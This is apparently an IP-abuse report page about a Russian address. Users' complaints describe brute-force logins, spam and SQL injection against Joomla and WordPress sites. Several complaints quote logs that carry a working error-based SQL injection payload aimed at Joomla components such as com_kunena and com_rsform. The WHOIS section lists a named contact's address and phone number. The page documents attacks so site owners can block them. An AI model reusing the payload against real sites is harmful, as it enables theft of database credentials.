Loading...

188.143.232.144 is in Saint Petersburg, Russian Federation

188.143.232.144 is known for brute force, hacking, spam, SQL injection.

The report has been created on Mar 27, 2017 11:31:07
The IP address 188.143.232.144 belongs to Petersburg Internet Network ltd. ISP in Saint Petersburg (Saint Petersburg City, 66), Russian Federation (59.8944015503 and 30.2642002106). The hostname is 188.143.232.144.
Russia (Russian Federation, RUS) is a High income: nonOECD country in Europe & Central Asia. The currency is Russian ruble.
As of Mar 27, 2017 11:31:07 we have 24 complaint(s) about 188.143.232.144. Based on our records, the 188.143.232.144 has been involved in brute force, hacking, spam, SQL injection, etc.

188.143.232.144

IP Address Country:  Russian Federation (RU)
IP Address Region:66 Saint Petersburg City
IP Address City:Saint Petersburg
IP Postal Code
IP Address Area Code0
IP Metro Code0
IP Address Latitude:59.8944015503
IP Address Longitude:30.2642002106
IP Address ISP: Petersburg Internet Network ltd.
Organisation:
IP Address Proxy:
IP Address Host:188.143.232.144
Map is loading...

If 188.143.232.144 is causing you trouble (doing SPAM, brute-force, DOS attack, phishing, or other fraud), you can report the abuser right here!



We have 24 complaints about 188.143.232.144


Anonymous user from 75.144.114.94 in United States
>2 months agoFrequent Wordpress Attacks - in Brute Force
"Russian IP addresses from the same subnet are working to get into Wordpress. IPs rotate as they are blocked in the firewalls."

Anonymous user from 1.0.253.87 in Australia
>4 years agocybercrime from Russian descr LeonLundberg-net, 188.143.232.211, 188.143.232.33, 188.143.232.12 - in SQL Injection
"viereruck@gmail.com, wessoywof@gmail.com, Tinoarcargine, clarmaliaidge@gmail.com
252+ spam items - 19-Nov-11 13:43 - 29-Dec-11 20:17 - 188.143.232.144
http://www.stopforumspam.com/ipcheck/188.143.232.144

=====> complaints ==> 188.143.232.144
Frequently (3 to 4 times a day) using application form
Automated attack against a Joomla site
Trying to hack joomla backend
trying to log to my website
Trying to hack Joomla Web site
This ip try hack my site
Hacking Joomla site..
Trying to Login
joomla 2.5.6 sql injection from russian ip
Repeated hacking attempts by russian reffered by GOOGLE
Trying to hack joomla backend. Is anyone actually doing something about this?
Same issues - Joomla script or SQL injection

Here coming clear answers =========>

188.143.232.12, 188.143.232.33, 188.143.232.36, 188.143.232.84, 188.143.232.105
188.143.232.113, 188.143.232.144, 188.143.232.146, 188.143.232.147, 188.143.232.176, 188.143.232.211

Russian spamming hack - 188.143.232.211, 188.143.232 - descr LeonLundberg-net
http://www.ipillion.com/ip/188.143.232.211

Russian Spam Mafia, 188.143.232.12, 188.143.232.211, singingfem@aol.com, descr LeonLundberg-net
http://www.ipillion.com/ip/188.143.232.12

.... I received spam from this ip - 2012-09-04
a lot of spam is coming from this address - 2012-09-07
friggin spammer why isnt it stopping, i had to go through a lot of trouble to make it stop 2012-09-07
spam the contact form of my website - is russian spamming hack - 2012-09-16
I also received spam from this bugger - 2012-10-03
188.143.232.211 - SPAMMER - 2012-10-04
I received a fake subscription from this IP address - 2012-10-05
Spammer, logged in our site and did two watch repair request with all wired letters etc.
What can we do to prevent such spammers from getting in the system?
My solution for the moment is banning the ip address. Looking for an long term solution. 2012-10-05
Spam Bot!!! - 2012-10-08 spammer - 2012-10-16 spammer - 2012-10-22 .....
http://whatismyipaddress.com/ip/188.143.232.211

200+ spam items - 6-Nov-11 08:28 - 22-Oct-12 06:30
http://www.stopforumspam.com/ipcheck/188.143.232.33

==> 8178+ spam items - 7-Nov-12 21:41 - 7-Nov-12 21:41
http://www.stopforumspam.com/ipcheck/188.143.232.211

The Project Honey Pot system has detected behavior from 188.143.232.211
that is consistent with that of a Comment Spammer
http://www.projecthoneypot.org/ip_188.143.232.211

kicked off in car guest books - 70.36.0.101 - 188.165.12.96 - 188.143.232.33 - 46.118.114.45
Attention, moteur de spam au profit de Elite Auto newsletters.elite-auto.fr
Thousands of back links to my site www.greatautohelp.com
http://www.ipillion.com/ip/70.36.0.101

2012/05/30 (Wed) 188.143.232.176
http://www.casino-deblackjack.com ==> blackjack gratuit en ligne légal casino autorisé en france
2012 - http://giochionline.gjdfbfgoweemrbep.com - giochi online - host: 188.143.232.176 ...
http://spaceofmystery.bbs.fc2.com/?act=reply&tid=3791134

==> This Person Continues to Fill My Submission Form
Contact Email singingfem@aol.com - 188.143.232.12
Remote User: HTTP User Agent: Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01
Date: 10/10/2012 Time: 03:27 PM
188.143.232.144 ==> Got attack attempts from this ip in Joomla ....
I was getting Marco's interceptor warning for my website with REMOTE_ADDR 188.143.232.144
HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1
http://www.ipillion.com/ip/188.143.232.144

Online Casino Spambot ==> it's 24/7 real
As shown in the log below
.... is being utilized by an ==> online casino comment spam botnet operator
==> targeting blogs, forums and Wiki's with spam promotions
==> this moron is registering multiple user names at one time to machine gun spam
==> any web page that accepts comments or messages ......
http://www.forumpostersunion.com/showthread.php?t=6551

we know a 24/7 casino/poker/games/porn/medial/viagra/pharmacy/payloan/sales
==> webhosting & joomla spammer

with unique spam characteristic contents, keyword mix, language expressions
who posts in English, Italian, French, German, pitiful Spanish, Russian, Vietnamese

search ==> 188.143.232.144 casino guestbook ==> 188.143.232.211 casino guestbook

7/10/2012 3:33:24 PM - 188.143.232.211 - malta online gambling
http://slots-machine-games-online870.bravesites.com
*casino* best place in vegas for craps, usa accepted no deposit casinos
http://www.casinobet777.com - bicycle *casino* bell gardens
bedroom roulette - http://blackjack-software-download69.webs.com

7/10/2012 3:35:33 PM - 188.143.232.211 - *casino* pa
snoqualmie *casino* grand opening - http://nys-casinos262.metroblog.com
bo dog blackjack, play Irish Luck slots, palace casinos
http://casino-red-games26.lefora.com - play Field of Green slots
smoking nj casinos, sands *casino* wiki siena reno *casino*
http://nys-casinos262.metroblog.com

2012-10-19 16:21:41 - roulette red and black strategy
http://teriatrawler.onlinecasino-usa.us
bc online *casino* http://ntepass.gamesonlinecasinousa.us
jack system online strategies http://tokenmy.24onlinecasino.us
illegal roulette strategies
http://tubevox.24casinoonline.us/illegal-roulette-strategies.html
the effectiveness of the knockout system blackjack
http://aquayaki.onlinecasinousagames.us
basic betting strategy blackjack http://deotanger.casino-online-usa.us
rules to blackjack http://marketidian.gamesonlinecasinousa.us
best video keno games *casino*
http://clusterthought.usagamesonlinecasino.us
online *casino* with the lowest deposit
http://ismpillar.24onlinecasino.us/online-casino-with-the-lowest-deposit.html
playing blackjack http://orderero.gamesonlinecasinousa.us
free video slot machine
http://plextwitter.onlinecasinousagames.us/free-video-slot-machine.html
vote no casinos http://tagrange.casino-online-usa.us/vote-no-casinos.html

IP: 188.143.232.211 - Browertype Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
2012-10-19 16:17:09 - www.horseshoe *casino* ....
IP: 188.143.232.211 Browertype Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1; SV1)
2012-10-23 15:10:13 - play quick hit slots online ......
IP: 188.143.232.211 Browertype Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
2012-10-23 15:04:47 - top online casinos details .....
IP: 188.143.232.211 Browertype Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
2012-10-23 15:00:04 - blackjack games online ....
IP: 188.143.232.211 Browertype Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

2012-10-23 14:55:17 - slots with best odds ...
slot machine payout, solvang ca *casino* slots in georgia
play Sevens and Stripes slots, wheel of fortune slot machines for sale
==> mit roulette geld verdienen online
http://nikceru.gamesusaonlinecasino.us/mit-roulette-geld-verdienen-online.html
fortune room online *casino* ver blackjack online latino
==> nouveau *casino* blackjack
http://divanyx.gamesusaonlinecasino.us/nouveau-casino-blackjack.html
IP: 188.143.232.211 Browertype Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

..... http://flipflash.bonusonlinecasinousa.us/can-you-win-playing-keno.html
==> jugar blackjack online gratis multi jugador, gambling online slot
www.yourbestonlinecasino.com, blackjack edge, can you win playing keno
stockholm *casino*, vegas *casino* guide, do slot machine pay out in
cycles, spel pa *casino*, bodog roulette practice, play american roulette online fun
where can i play roulette online, slot machine marapets
complaints against online *casino*, online *casino* hack software
10/23/2012 4:30:12 PM - 188.143.232.211

http://geture.bonususaonlinecasino.us/pharaons-gold-slots.html
comment6, skill slots, kerching online slots, wms wizard of oz slots
roulette wheel odds and statistics, maloof brothers *casino*, online
slots real money reviews, kenowa football, best slots to play at sycuan
*casino*, play online keno games, the most beautiful words online
*casino*, strategy playing penny slots, rules of vegas blackjack
Bar Black Sheep slots, company selling slot machines, how to win in
baccarat strategy, playing online craps, online baccarat, easter eggs
cheats in slot machines, how can i play blackjack online for money,
10/23/2012 4:27:04 PM - 188.143.232.211
10/23/2012 4:25:24 PM - 188.143.232.211
10/23/2012 4:23:59 PM - 188.143.232.211
10/23/2012 4:20:56 PM - 188.143.232.211
10/23/2012 4:20:08 PM - 188.143.232.210
........19+ spam casino games
http://www.bartonvillage.com/gallery/guestbook/default.asp

cheating in poker - http://www.formspring.me/preselazrah
... 176.36.106.72 - 188.143.232.113
http://www.gdzcb.org/club/guestbook.asp?page=677

new members that appear to be bots
==> this is part of my attempt to automate reporting of possible robot clients that register to post on our forum
recent forum spammers - 12-31-2010 04:06:49 - betting bet@uganska.net ...
05-29-2011 10:13:23 - cadellstelo gileswrenn89aa@mail.ru - 188.143.232.176
06-03-2011 12:42:08 - flaliaAppoish rexanaxyzki@mail.ru - 188.143.232.176
http://www.mtrpa.org/phpBB2/regbots.php

.... http://www.formspring.me/monciemote - email@gmail.com
535641273 - 188.143.232.113
http://www.formspring.me/dikalmcenti - email@gmail.com
670915138 - 188.143.232.113
http://www.formspring.me/venttivicu - email@gmail.com
937105668 - 188.143.232.113 ...
http://www.gdzcb.org/club/guestbook.asp?page=677

... Posted September 28 2012 16:18:39 from 188.143.232.33
http://bmthfjgjgcsg.com - http://cmoohjtyeizg.com
Posted September 15 2012 00:30:04 from 188.143.232.33
http://jyjhlwdaxvnf.com - http://wkwvhwzgrrlv.com
Posted September 11 2012 10:27:49 from 188.143.232.33
http://laonthxqsxfc.com - http://vepthbicwbxs.com ....
http://www.peter.zahuczki.hu/?&guestbook

.... 188.143.232.33 - Date 06 Oct 2012 19:25:49
http://qwfilxqlcavn.com - http://stodlbzlpdwx.com ....
http://www.reeltimeguideservice.com/guestbook.htm

Reel Time Guide Service on Nuts and Bolts Fishing
... 188.143.232.33 - 06 Oct 2012 19:25:49
http://qwfilxqlcavn.com - http://stodlbzlpdwx.com ...
http://www.reeltimeguideservice.com/guestbook.htm

.... Posted September 28 2012 07:01:17 from 188.143.232.33
http://vhqcxfaqeibo.com - http://dsvtlaymlmup.com
Posted September 28 2012 07:01:17 from 188.143.232.33
http://vhqcxfaqeibo.com - http://dsvtlaymlmup.com ...
http://www.customsaab.com/tommyturbo/?&guestbook

.... 3056 dropopaw - diaderho@gmaiel.com - IP 188.143.232.33
skype http://members.msn.com/diaderho@gmaiel.com
Thursday 11/01/2012 22:17:43 MDT
No Prescription Need SOMA Cod Antibiotic Ciprofloxacin
3050 abtranunan - philali@gmaiel.com - IP 188.143.232.33
skype http://members.msn.com/philali@gmaiel.com
Thursday 11/01/2012 21:48:43 MDT
3047 riwalteu - tiporela@gmaiel.com - IP 188.143.232.33
skype http://members.msn.com/tiporela@gmaiel.com
Thursday 11/01/2012 21:19:43 MDT
Price Fixing Levitra, toj, Cipro For Menengitis, Tadalafil Document
Buy And Sell Cipro On Ebay, P, Cialis Online Safety
What Is Ciprofloxacin Hcl Tabs, Amoxicillin And Cialis Pills Tips
Cheap Cialis Pillstore Amoxicillin Or Cipro ....
http://www.studio206online.com/Guestbook.php

inetnum: 188.143.232.0 - 188.143.232.255
netname: LeonLundberg-net
descr: net for dedicated server client
country: RU
admin-c: LL4959-RIPE
person: Leon Lundberg
address: Liljerum Grenadjartorpet 71
address: 173 57 TOMTEBODA
phone: +467348510378

no email for abuse issues, doesn't works --> mail[at]dash-hosting.com
http://riskyinternet.com/what-is/ip/188.143.232.131

--------------------------------------------------

Junk email content - Hacking on my website form 188.143.232.33
http://www.ipillion.com/ip/188.143.232.33

hacking spamming black links scrap - 188.143.232.33 - 188.143.232.84
http://www.ipillion.com/ip/188.143.232.33

mass spam email@gmail.com, jonn1, jonn2, jonn3, 91.201.66.76, 188.143.232.33
http://www.ipillion.com/ip/91.201.66.76

backlink scrap - 188.143.232.84 - 96.47.225.74 - 96.47.225.82 - 96.47.225.170
96.47.225.178 - 96.47.225.186
http://www.spaminform.com/spam-report/-c919069.html

hace me 1,000 clicks - museum betting poker bot spam monster 188.143.232.176
hacking spam freak is back? 98.136.217.202 - 188.143.232.176
http://www.ipillion.com/ip/188.143.232.176

188.143.232.84 - spam
http://www.ipillion.com/ip/188.143.232.84

hacking spamming back links scrap - 188.143.232.33 - 188.143.232.84
http://www.ipillion.com/ip/188.143.232.33

hace me 10,000 clicks - museum betting poker bot spam monster 188.143.232.176
http://www.spaminform.com/spam-report/-c920014.html

Russian spamming hack, 188.143.232.211, 188.143.232, descr LeonLundberg-net
188.143.232.12, 188.143.232.33, 188.143.232.36, 188.143.232.84
http://www.spaminform.com/spam-report/-c920739.html

"

Anonymous user from 82.176.95.100 in Netherlands
>4 years agoFrequently (3 to 4 times a day) using application form - in Spam
"In the past 2 week every 6 to 8 hours a form is filled with all kind of non existing information and send from website.
Action: diabled ru from webaccess"

Anonymous user from 122.178.177.206 in India
>4 years agoJoomla backend hacking - in SQL Injection
"** Table name in url [GET:Itemid] => 37' and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
** Table name in url [REQUEST:Itemid] => 37' and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

**PAGE / SERVER INFO


*REMOTE_ADDR :
188.143.232.144

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_rsform&Itemid=37'+and(select%201%20from(select%20count(*),concat((select%20username%20from%20jos_users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'

*HTTP_REFERER :
http://www.google.com/



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
-[option] => com_rsform
-[Itemid] => 37' and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
-[option] => com_rsform
-[Itemid] => 37' and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'"

Anonymous user from 108.178.135.7 in
>4 years agoTrying to hack joomla backend. Is anyone actually doing something about this? - in Hacking
"Trying to hack joomla backend. He hacked 2 sites but couldn't on the rest of them.

Is anyone actually doing something about this? How many complains before actions are taken?

index.php?option=com_spidercalendar&date='and(select%201%20from(select%20count(*),concat((select%20username%20from%20jos_users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'"

Anonymous user from 212.170.192.172 in Spain
>4 years agoSQL INjection - in SQL Injection
"Try this GET attemp: 188.143.232.144 - - [04/Sep/2012:00:07:10 +0200] "GET /index.php?option=com_rsform&Itemid=37'+and(select%201%20from(select%20count(*),concat((select%20username%20from%20jos_users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and' HTTP/1.1" 404 1540 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1"
"

Anonymous user from 71.205.47.139 in United States
>4 years agoGot attack attempts from this ip - in Hacking
"in Joomla! I was getting Marco's interceptor warning for my website with

*REMOTE_ADDR :
188.143.232.144

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1

*REQUEST_METHOD :
GET

so I went to cPanel (the host side) and blocked all users from that ip"

Anonymous user from 110.232.243.10 in Australia
>4 years agoSame issues - Joomla script or SQL injection - in SQL Injection
"This IP has done the same as everyone else - blocking the IP address now

** Table name in url [GET:func] => \'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'
** Table name in url [REQUEST:func] => \'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'

**PAGE / SERVER INFO


*REMOTE_ADDR :
188.143.232.144

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=%27and(select%201%20from(select%20count(*),concat((select%20username%20from%20jos_users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and%27

*HTTP_REFERER :
http://www.google.com/



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
-[option] => com_kunena
-[func] => \'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
-[option] => com_kunena
-[func] => \'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'
"

Anonymous user from 122.148.121.97 in Australia
>4 years agoRepeated hacking attempts by russian reffered by GOOGLE - in SQL Injection
"This person is injecting code into my site such as:

** Table name in url [GET:func] => \'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'
** Table name in url [REQUEST:func] => \'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'

**PAGE / SERVER INFO


*REMOTE_ADDR :
188.143.232.144

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=%27and(select%201%20from(select%20count(*),concat((select%20username%20from%20jos_users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and%27

*HTTP_REFERER :
http://www.google.com/



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
-[option] => com_kunena
-[func] => \'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
-[option] => com_kunena
-[func] => \'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'
"

Anonymous user from 178.48.122.138 in
>4 years agojoomla 2.5.6 sql injection from russian ip - in SQL Injection
"** Table name in url [GET:func] => \'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'
** Table name in url [REQUEST:func] => \'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'

**PAGE / SERVER INFO

*REMOTE_ADDR :
188.143.232.144

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func='and(select%201%20from(select%20count(*),concat((select%20username%20from%20jos_users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'

*HTTP_REFERER :
http://www.google.com/

** SUPERGLOBALS DUMP (sanitized)

*$_GET DUMP
-[option] => com_kunena
-[func] => \'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'

*$_POST DUMP

*$_COOKIE DUMP

*$_REQUEST DUMP
-[option] => com_kunena
-[func] => \'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'"

Anonymous user from 82.121.27.58 in France
>4 years agotrying to hack joomla websites - in Hacking
"Someone is trying to hack a joomla website of mine from this IP;
here is their hack :
** Table name in url [GET:func] => \'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'
** Table name in url [REQUEST:func] => \'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'

**PAGE / SERVER INFO


*REMOTE_ADDR :
188.143.232.144

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func='and(select%201%20from(select%20count(*),concat((select%20username%20from%20jos_users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'

*HTTP_REFERER :
http://www.google.com/



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
-[option] => com_kunena
-[func] => \'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
-[option] => com_kunena
-[func] => \'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\'


"

Anonymous user from 122.178.172.233 in India
>4 years agoHacking Joomla site.. - in Hacking
"* Table name in url [GET:func] => 'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
** Table name in url [REQUEST:func] => 'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

**PAGE / SERVER INFO


*REMOTE_ADDR :
188.143.232.144

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func='and(select%201%20from(select%20count(*),concat((select%20username%20from%20jos_users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'

*HTTP_REFERER :
http://www.google.com/



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
-[option] => com_kunena
-[func] => 'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
-[option] => com_kunena
-[func] => 'and(select 1 from(select count(*),concat((select username from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'



Marco's interceptor warning"

Anonymous user from 180.214.232.15 in Indonesia
>4 years agoThis ip try hack my site - in SQL Injection
"This ip addres tried to hack my site... several times in this week
Tries to enter my site with http get, try to login to back end, etc ...
"

Anonymous user from 27.7.58.6 in India
>4 years agoTrying to hack Joomla Web site - in Hacking
"He tried to hack my Joomla Website, but he was unsuccessful.
If you search this IP at google, you will see a lot of hacking attempts from this same IP."

Anonymous user from 93.74.238.164 in Ukraine
>4 years agojoomla sql injection - in SQL Injection
"On 16 July 2012 this IP tried by REQUEST_METHOD : GET to select username from DB but failed as i'm using the Marco's interceptor plugin.
"

Anonymous user from 88.168.100.85 in France
>4 years agotrying to log to my website - in Hacking
"this IP tried to log into the standard admin user account on my web site and got blocked by limited login attempt plugin. seems to have given up.
Her text: nom : gordon
prenom : gordon
mail : joseph72@hotmail.com
propose : 6nUUWv http://www.FPU7vqiRhHghotBHegWQdZiVgO8pMSe6.com
recherche : 6nUUWv http://www.FPU7vqiRhHghotBHegWQdZiVgO8pMSe6.com"

webgobe
>4 years agoAutomated attack against a Joomla site - in Brute Force
"On 03 June 2012 from this IP where registered a series of 200+ attempts - probably dictionary-based, automated attacks - to login on administrative backend of a Joomla powered site"

Anonymous user from 186.204.97.18 in Brazil
>4 years agotrying to log to my website - in Brute Force
"trying to log to my joomla website using default username. . . . . . . . . . . . . . . . "

Anonymous user from 99.252.213.36 in Canada
>4 years agoTrying to hack joomla backend - in Brute Force
"this ip 188.143.232.144 tried hacking my multiple joomla backend but failed as i'm using a security. i see lots of complaints about it here and elsewhere. "

Anonymous user from 98.230.200.10 in United States
>4 years agocomplaint - in Hacking
"this IP tried to log into the standard admin user account on my joomla web site and got blocked by limited login attempt plugin. seems to have given up"

Anonymous user from 41.205.172.181 in Nigeria
>4 years agoTrying to Login - in Hacking
"this IP tried to log into the standard admin user account on my word press driven site and got blocked by limited login attempt plugin."
>4 years agowordpress - in Brute Force
"trying to gain access to my site, which is tripwealth.com, i'm not happy and would love to counter attack. not sure whats going on as there are other complaints which are similar..."

Anonymous user from 213.46.202.80 in Netherlands
>4 years agoWordpress login attempt - in Brute Force
"A user/script from this site tried to log into the standard admin user account on word press and got blocked by limited login attempt plugin."

Anonymous user from 31.160.144.27 in
>4 years agoWordpress hack - in Hacking
"Trying to login to our corporate website using the default WP username admin. The attempts were unsuccessful and blocked by the Login Lock plugin that blocked this IP for quite a while. Hacker gave up after that."

WHOIS for 188.143.232.144

[Querying whois.arin.net]
[Redirected to whois.ripe.net:43]
[Querying whois.ripe.net]
[whois.ripe.net]
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '188.143.232.0 - 188.143.232.255'

inetnum: 188.143.232.0 - 188.143.232.255
netname: LeonLundberg-net
descr: net for dedicated server client
country: RU
admin-c: LL4959-RIPE
tech-c: LL4959-RIPE
status: ASSIGNED PA
mnt-by: MNT-PIN
source: RIPE # Filtered

person: Leon Lundberg
address: Liljerum Grenadjartorpet 71
address: 173 57 TOMTEBODA
phone: +467348510378
nic-hdl: LL4959-RIPE
mnt-by: MNT-PINSUPPORT
source: RIPE # Filtered

% Information related to '188.143.232.0/23as44050'

route: 188.143.232.0/23
descr: Route to PIN
origin: as44050
mnt-by: MNT-PIN
source: RIPE # Filtered

% This query was served by the RIPE Database Query Service version 1.6.12 (WHOIS4)

Abusing IP Addresses from the same C block

IP AddressAbuseComplaints
188.143.232.105spam:1 complaints
188.143.232.108spam:1 complaints
188.143.232.109spam:1 complaints
188.143.232.111brute force:phishing:3 complaints
188.143.232.113spam:1 complaints
188.143.232.12spam:4 complaints
188.143.232.128brute force:hacking:6 complaints
188.143.232.133brute force:1 complaints
188.143.232.14 complaints
188.143.232.15 complaints
188.143.232.153brute force:hacking:5 complaints
188.143.232.155spam:1 complaints
188.143.232.16 complaints
188.143.232.176fraud:FTP hacking:hacking:spam:SQL injection:22 complaints
188.143.232.184brute force:hacking:17 complaints
188.143.232.191hacking:1 complaints
188.143.232.200form post hijacking:fraud:hacking:phishing:spam:SQL injection:12 complaints
188.143.232.204form post hijacking:spam:SQL injection:3 complaints
188.143.232.211form post hijacking:spam:6 complaints
188.143.232.224brute force:2 complaints
188.143.232.27 complaints
188.143.232.30hacking:1 complaints
188.143.232.32 complaints
188.143.232.33hacking:spam:4 complaints
188.143.232.45brute force:1 complaints
188.143.232.80spam:1 complaints
188.143.232.84form post hijacking:spam:4 complaints

Other Brute Force, Hacking, Spam, SQL Injection Complaints

1 hr 26 min  ago United States216.66.6.87"hacking into my facebook account"
3 days  ago South Africa41.15.80.36"Jacques Hendricksâ41.13.238.193"
12 days  ago India117.249.139.174"Hacking of our website by BSNL IP 117.249.139.174"
17 days  ago Netherlands37.1.203.211"Typo3 Hacking"
20 days  ago United States172.56.20.164"Hacking steam account"
21 days  ago China110.86.102.165"Gmail account accessed"
25 days  ago Benin41.138.91.230"Donation To You"
26 days  ago Australia49.180.53.153"Use of my Facebook account and made changes for a long time "
27 days  ago Brazil200.243.120.130"Atten: Beneficiary!!Payment Notification! ! Should We Pay Your Representatives The $22.5m? dmel "
>1 month ago 192.168.1.23"192.168.1.23"